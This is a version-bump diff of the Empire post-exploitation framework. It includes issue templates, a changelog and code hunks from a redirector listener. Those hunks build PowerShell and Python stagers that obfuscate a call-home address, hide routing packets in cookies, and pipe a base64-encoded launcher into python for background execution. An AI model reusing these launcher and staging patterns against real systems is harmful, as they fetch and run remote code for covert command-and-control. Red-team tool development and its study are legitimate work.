New upstream version 3.1.2
Sophie Brun
4 years ago
0 | --- | |
1 | name: Bug report | |
2 | about: Create a report to help us improve | |
3 | title: "[BUG]" | |
4 | labels: bug | |
5 | assignees: '' | |
6 | ||
7 | --- | |
8 | ||
9 | **Empire Version** | |
10 | - Empire 3.x | |
11 | ||
12 | **OS Information (Linux flavor, Python version)** | |
13 | - OS: | |
14 | - Python: | |
15 | ||
16 | **Describe the bug** | |
17 | A clear and concise description of what the bug is. | |
18 | ||
19 | **To Reproduce** | |
20 | Steps to reproduce the behavior: | |
21 | 1. Go to '...' | |
22 | 2. Click on '....' | |
23 | 3. Scroll down to '....' | |
24 | 4. See error | |
25 | ||
26 | **Expected behavior** | |
27 | A clear and concise description of what you expected to happen. | |
28 | ||
29 | **Screenshots** | |
30 | If applicable, add screenshots to help explain your problem. | |
31 | ||
32 | **Additional context** | |
33 | Add any other context about the problem here. |
0 | --- | |
1 | name: Feature request | |
2 | about: Suggest an idea for this project | |
3 | title: "[FEATURE REQUEST]" | |
4 | labels: enhancement | |
5 | assignees: '' | |
6 | ||
7 | --- | |
8 | ||
9 | **Is your feature request related to a problem? Please describe.** | |
10 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] | |
11 | ||
12 | **Describe the solution you'd like** | |
13 | A clear and concise description of what you want to happen. | |
14 | ||
15 | **Describe alternatives you've considered** | |
16 | A clear and concise description of any alternative solutions or features you've considered. | |
17 | ||
18 | **Additional context** | |
19 | Add any other context or screenshots about the feature request here. |
0 | # Comment that will be sent if an issue is judged to be closed | |
1 | comment: "This issue is closed because it does not meet our issue template. Please resubmit with the correct template." | |
2 | issueConfigs: | |
3 | # There can be several configs for different kind of issues. | |
4 | - content: | |
5 | # Example 1: bug report | |
6 | - "Empire Version" | |
7 | - "OS Information (Linux flavor, Python version)" | |
8 | - "Describe the bug" | |
9 | - "To Reproduce" | |
10 | - "Expected behavior" | |
11 | - "Screenshots" | |
12 | - "Additional context" | |
13 | ||
14 | - content: | |
15 | # Example 2: feature request | |
16 | - "Is your feature request related to a problem? Please describe." | |
17 | - "Describe the solution you'd like" | |
18 | - "Describe alternatives you've considered" | |
19 | - "Additional context" | |
20 | ||
21 | - content: | |
22 | # Example 3: fall back | |
23 | - "Empire Version" | |
24 | - "OS Information (Linux flavor, Python version)" | |
25 | - "Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better." | |
26 | - "Screenshot of error, embedded text output, or Pastebin link to the error" | |
27 | - "Any additional information" |
0 | 3/13/2020 | |
1 | ------------ | |
2 | - Version 3.1.2 Master Release | |
3 | - Fixed REST login error 500 on some version of SQLite - #120 (@justsly) | |
4 | - Fixed generate launcher bug for redirector listener - #125 (@RedBulletTooling) | |
5 | ||
0 | 6 | 3/8/2020 |
7 | ------------ | |
1 | 8 | - Version 3.1.1 Master Release |
2 | 9 | - Updated the /me endpoint that was added in 3.1.0 to return the full user object (@Vinnybod) |
3 | 10 | - Updated install script for Kali Powershell install - #118 (@Vinnybod) |
14 | 14 | from builtins import str |
15 | 15 | from builtins import range |
16 | 16 | |
17 | VERSION = "3.1.1 BC-Security Fork" | |
17 | VERSION = "3.1.2 BC-Security Fork" | |
18 | 18 | |
19 | 19 | from pydispatch import dispatcher |
20 | 20 |
107 | 107 | try: |
108 | 108 | self.lock.acquire() |
109 | 109 | cur = conn.cursor() |
110 | user = cur.execute("SELECT password from users WHERE username = ? AND enabled = true LIMIT 1", (user_name,)).fetchone() | |
110 | user = cur.execute("SELECT password from users WHERE username = ? AND enabled = 1 LIMIT 1", (user_name,)).fetchone() | |
111 | 111 | |
112 | 112 | if user == None: |
113 | 113 | return None |
194 | 194 | |
195 | 195 | # prebuild the request routing packet for the launcher |
196 | 196 | routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='') |
197 | b64RoutingPacket = base64.b64encode(routingPacket) | |
197 | b64RoutingPacket = base64.b64encode(routingPacket).decode("utf-8") | |
198 | 198 | |
199 | 199 | #stager += "$ser="+helpers.obfuscate_call_home_address(host)+";$t='"+stage0+"';" |
200 | stager += "$ser='%s';$t='%s';$hop='%s';" % (helpers.obfuscate_call_home_address(host), stage0, listenerName) | |
200 | stager += "$ser=%s;$t='%s';$hop='%s';" % (helpers.obfuscate_call_home_address(host), stage0, listenerName) | |
201 | 201 | |
202 | 202 | #Add custom headers if any |
203 | 203 | if customHeaders != []: |
263 | 263 | |
264 | 264 | # prebuild the request routing packet for the launcher |
265 | 265 | routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='') |
266 | b64RoutingPacket = base64.b64encode(routingPacket) | |
266 | b64RoutingPacket = base64.b64encode(routingPacket).decode("utf-8") | |
267 | 267 | |
268 | 268 | launcherBase += "req=urllib2.Request(server+t);\n" |
269 | 269 | # add the RC4 packet to a cookie |
324 | 324 | launcherBase += "exec(''.join(out))" |
325 | 325 | |
326 | 326 | if encode: |
327 | launchEncoded = base64.b64encode(launcherBase) | |
327 | launchEncoded = base64.b64encode(launcherBase).decode("utf-8") | |
328 | 328 | launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | /usr/bin/python &" % (launchEncoded) |
329 | 329 | return launcher |
330 | 330 | else: |